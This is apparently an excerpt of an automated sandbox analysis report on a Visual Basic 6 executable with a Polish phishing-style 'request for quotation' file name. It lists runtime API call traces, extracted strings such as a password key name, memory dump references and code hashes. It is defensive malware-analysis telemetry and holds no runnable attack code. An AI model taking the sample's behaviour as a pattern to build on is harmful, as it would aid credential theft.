                                                                                                                                                                                                                                                      • __vbaStrFixstr.MSVBVM60(00000104,?), ref: 0041BF58
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041BF66
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000), ref: 0041BF7A
                                                                                                                                                                                                                                                      • __vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 0041BF93
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041BFB8
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041BFC4
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,?), ref: 0041BFD9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041BFE7
                                                                                                                                                                                                                                                      • #578.MSVBVM60(00000000), ref: 0041BFEE
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C00D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,?), ref: 0041C031
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C03F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0041C056
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C062
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,["szPW"],?,00000001), ref: 0041C07C
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,004095E4,?,-00000008), ref: 0041C0B5
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,004095E4,?,-00000001), ref: 0041C0EE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041C353
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041C3F0), ref: 0041C3B0
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C3B9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C3C2
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C3CB
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C3D7
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C3E0
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C3E9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0041C406
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$Error$Ansi$BoundsFixstrGenerate$#578CopyDestructListLsetOverflowSystem
                                                                                                                                                                                                                                                      • String ID: *.dat$59ABCQEF01$["szPW"]
                                                                                                                                                                                                                                                      • API String ID: 806118442-2789598873
                                                                                                                                                                                                                                                      • Opcode ID: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
                                                                                                                                                                                                                                                      • Instruction ID: e520ffca7d995d5c9d8e1e4b7866a297511e66e05a072c8871b128296ca8dfb1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78D10C71A00258EFDB14DFA0DE88BDEB775EB48301F1081A9E50AB72A0DB745E85CF19
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                                                                                                                                                                                      • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041AB1D
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041AB5E
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000), ref: 0041AB6F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041AB84
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,?,?,00000000), ref: 0041AB99
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABA7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041ABBE
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041ABCA
                                                                                                                                                                                                                                                      • #517.MSVBVM60(?,?,00000000), ref: 0041ABDB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABE9
                                                                                                                                                                                                                                                      • #517.MSVBVM60(?,00000000,?,00000000), ref: 0041ABF7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041AC05
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 0041AC0C
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041AC30
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041AC77
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041AC8D
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041ACA6
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 0041ACCA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041AD37), ref: 0041AD03
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041AD1B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041AD24
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041AD30
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                                                                                                                      • String ID: *.dat$+$00000$59ABCQEF01$["szPW"]$d/m/yy h:m$system\$yymmdd
                                                                                                                                                                                                                                                      • API String ID: 3648932012-3366732667
                                                                                                                                                                                                                                                      • Opcode ID: 7668726f4cd95b987f5e59ec2b7e3e1321d326a0ceac46527a88094c400bc5a0
                                                                                                                                                                                                                                                      • Instruction ID: 2d0d5c7510d645d02d0112559b502ebe2581ea1b8a188934723facc0c59fc7af
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7668726f4cd95b987f5e59ec2b7e3e1321d326a0ceac46527a88094c400bc5a0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03A11875901219EBDB10DFA0DE48BDEBBB4FB48305F1081A9E50AB72A0DB745A84CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004190EE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 0041911B
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF), ref: 0041912A
                                                                                                                                                                                                                                                      • #618.MSVBVM60(?,00000004), ref: 0041913D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00419148
                                                                                                                                                                                                                                                      • #517.MSVBVM60(00000000), ref: 0041914F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041915A
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00419163
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(.png,?), ref: 00419179
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00419192
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(.gif,?), ref: 004191AD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004191C6
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 004192FA
                                                                                                                                                                                                                                                      • #644.MSVBVM60(?,?,?), ref: 0041932B
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0041934A
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 0041936F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(004193A2), ref: 00419389
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00419392
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041939B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$ErrorFree$CopySystem$Move$#517#618#644Chkstk
                                                                                                                                                                                                                                                      • String ID: .bmp$.gif$.jpg$.png$.tif$image/bmp$image/gif$image/jpeg$image/png$image/tiff$jpeg$tiff
                                                                                                                                                                                                                                                      • API String ID: 1021285327-184555114
                                                                                                                                                                                                                                                      • Opcode ID: ba1cf2ca1d92ba703dd7003ebc9d02931437add039b3899e3393abdce3672aa7
                                                                                                                                                                                                                                                      • Instruction ID: 18cdca4dd913881e1e3906aabc5795d02bdbdb37ff3be22054c062f985fa0cbb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba1cf2ca1d92ba703dd7003ebc9d02931437add039b3899e3393abdce3672aa7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48710CB1900209EBDB04DFE1DA59BEEBB74FB44304F20806DE502B76A0D7785E45DB18
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(6CF8D9F5,00000000,6CF8D83C), ref: 004260E5
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004260ED
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 004260F1
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00426110
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 00426121
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0042612B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0042613A
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 0042616D
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00426183
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00426199
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004261B0
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004261C6
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,?), ref: 004261D7
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004261F4
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00426203
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00426224
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 0042622A
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 00426239
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0042624E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 00426259
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00426263
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00426272
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262D8
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262EB
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0042630A
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,?), ref: 00426314
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00426331
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00426339
                                                                                                                                                                                                                                                      • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0042634D
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00426366
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00426372
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,?), ref: 0042637C
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042639C
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004263AD
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 004263D5
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 004263E5
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 004263EE
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00426410
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 00426419
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00426466), ref: 00426443
                                                                                                                                                                                                                                                      • __vbaRecDestruct.MSVBVM60(00407F10,?), ref: 0042644E
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042645A
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00426463
                                                                                                                                                                                                                                                        • Part of subcall function 00426480: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00426152,?), ref: 004264B4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2812220623-0
                                                                                                                                                                                                                                                      • Opcode ID: 4bff154d9429e66b7277ffeb6f82d5934f284739e9e3ccb96d97e83057302d16
                                                                                                                                                                                                                                                      • Instruction ID: 6d216b33ba202ac5a5f4cc22896228a38d21b0d4e91878a3c687a56ceed05745
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bff154d9429e66b7277ffeb6f82d5934f284739e9e3ccb96d97e83057302d16
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7D12A71E00218ABCB04EFE5ED84DEEBBB9BF88704F50411EF505A7254DB74A942CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000,00000000), ref: 004206C8
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 004206D0
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 004206D4
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 004206EC
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004206FB
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 00420714
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00405414), ref: 0042071F
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 00420726
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 00420737
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042074B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00420755
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00420765
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 00420776
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000), ref: 00420779
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00420797
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004207C6
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00405414), ref: 004207CD
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000004,0042C250,00000000), ref: 00420815
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 0042081E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0042082B
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,0042C254,00000000), ref: 0042083C
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000004,0042C1C0,00000000), ref: 0042084C
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00420861
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00420879
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00420888
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?), ref: 00420899
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004208A4
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 004208B6
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004208BF
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004208E1
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60 ref: 004208EC
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60 ref: 00420918
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60 ref: 00420922
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$Get3$Copy$#516#631Bstr$#525#648ErrorFileOpen$#537BoundsGenerateList
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 695521769-0
                                                                                                                                                                                                                                                      • Opcode ID: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
                                                                                                                                                                                                                                                      • Instruction ID: 7f18cb6a5bab86a65f3f7d37ad3edf1072490e8e3ae84fdb7564aa9c634781f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADA1C071E00258DBCB14EFE5ED84ADEBBB5FF48300F50412AE516AB2A1DB745885CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,00000000,004032B6), ref: 00422C0E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004032B6), ref: 00422C3B
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004032B6), ref: 00422C4A
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00422C69
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00422C78
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?), ref: 00422C8C
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00422C9A
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422CAA
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000), ref: 00422CB1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422CBE
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422CF3
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422CFE
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422D0E
